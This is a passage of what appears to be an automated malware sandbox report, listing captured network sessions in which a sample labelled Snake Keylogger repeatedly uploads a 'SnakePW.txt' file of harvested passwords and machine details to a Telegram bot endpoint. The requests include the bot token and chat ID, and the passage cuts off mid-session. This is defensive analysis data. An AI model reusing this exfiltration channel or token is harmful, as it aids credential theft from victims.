                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            103192.168.2.549950149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:22 UTC173OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ee838fab
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:22 UTC174OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 38 33 38 66 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ee838fabContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:22 UTC174INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:22 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:22 UTC175INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66862,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228802,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            104192.168.2.549951149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:22 UTC175OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eec18c9c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:22 UTC175OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 63 31 38 63 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eec18c9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:23 UTC176INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:23 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:23 UTC176INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66863,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            105192.168.2.549952149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:23 UTC177OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eefd27b9
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:23 UTC177OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 66 64 32 37 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eefd27b9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:23 UTC178INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:23 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:23 UTC178INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66864,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            106192.168.2.549953149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:23 UTC179OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ef33fcf5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:23 UTC179OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 33 33 66 63 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ef33fcf5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:23 UTC179INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:23 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:23 UTC180INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66865,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            107192.168.2.549954149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:23 UTC180OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ef6f989b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:23 UTC181OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 36 66 39 38 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ef6f989bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:24 UTC181INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:24 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:24 UTC181INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66866,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            108192.168.2.549955149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:24 UTC182OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756efad95ba
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:24 UTC182OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 61 64 39 35 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756efad95baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:24 UTC183INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:24 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:24 UTC183INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66867,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            109192.168.2.549956149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:24 UTC184OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756efe20a71
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:24 UTC184OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 65 32 30 61 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756efe20a71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:24 UTC184INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:24 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:24 UTC185INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66868,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.549779149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:42 UTC18OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d6ea0e18
                            Host: api.telegram.org
                            Content-Length: 504
